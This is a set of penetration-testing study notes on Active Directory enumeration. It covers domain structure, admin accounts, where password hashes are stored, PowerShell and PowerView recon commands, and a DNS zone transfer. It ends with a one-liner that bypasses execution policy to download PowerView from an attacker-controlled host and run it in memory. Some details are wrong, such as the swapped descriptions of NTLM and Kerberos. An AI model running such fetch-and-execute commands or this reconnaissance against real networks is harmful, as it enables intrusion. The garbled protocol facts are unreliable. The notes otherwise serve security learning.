# Active Directory Enumeration

* Consists of
    * Domain Controller 
    * Organizational Units
        * Users
        * Groups
    * Trusts
    * AD Domains
    * AD Forest
    * Policies

* Administrative accounts are
    * Domain Admin
    * Enterprise Admin
    * Schema Admin
    * Server Operator
    * Account Operator

## Domain Controller

* AD Domain Services data store
* Authentication and authorization
* Update replication / sync with other domain controllers in the forest
* Administration of domain resources

### AD DS Store

* Database of directory info such as users, groups and services
    * `ntdis.dit` contains the information, including password hashes
    * `SystemRoot%\NTDS`

### Forest

* __Trees__, hierarchy of domains in the AD Domain Services
* __Domains__, groups of objects
* __Organizational Units (OU)__, containers of objects such as groups, users, printers and other resources
* __Trusts__, allows users to access resources in a different domain
* __Objects__ users, groups, printers, computers or shares
* __Domain Services__, DNS, LLMNR, SMB
* __Domain Schema__, Rules for object creation

### Users

* __Domain Admin__, DC access
* __Server Accounts__, service maintenance, may have admin permissions
* __Local Admin__, administrative persmission on an object but not the DC
* __Domain Users__, average user account on a local machine which may have admin permissions


### Policies

* Rule sets
* Apply to a domain
* Enable or disables services on a domain basis, like antivirus and malware scanning
    * __Disable Windows Defender__
    * Communication signing, e.g. SMB

### Domain Services 

* __LDAP__
* __Certificates__ handling for services, CRL
* __DNS, LLMNR, NBT-NS__

### Authentication

* __NTLM__, ticket granting service 
* __Kerberos__, challenge/response via hashes

## Usage

* Cmdlets on Domain Controller
* Get some help, `Get-Help Get-Command -Examples`, `Get-Command Get-*`

* From `ActiveDirectory` module
```sh
Import-Module Active-Directory
Get-ADDomain | Select-Object NetBIOSName,DNSRoot,InfrastructureMaster
Get-ADForest | Select-Object Domains
Get-ADTrust -Filter * | Select-Object Direction,Source,Target
```

* `systeminfo | findstr Domain`
* `Get-ADUser -filter *`
* Use found CN and DC and specify
* `Get-ADUser -filter * -searchBase "CN=Users,DC=<foundDC>,DC=<domainEnding>"`

### Powerview Module

* [Powerview](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1)
```sh
Import-Module .\PowerView.ps1
Get-NetDomain
Get-NetDomainController
Get-NetForest
Get-NetDomainTrust
```

### DNS
* Check ip via `ipconfig`
* `nslookup`, then `server <LocalIP>` and zone transfer via 
```sh
ls -d <Domain>
```

### Tips & Tricks

* Download and execute in one line
```sh
powershell -exec bypass -c  "IEX(New-Object Net.WebClient).downloadString('http://%ATTACKER_IP%:8000/PowerVi
ew.ps1'); Get-NetUser | select samaccountname, description"
```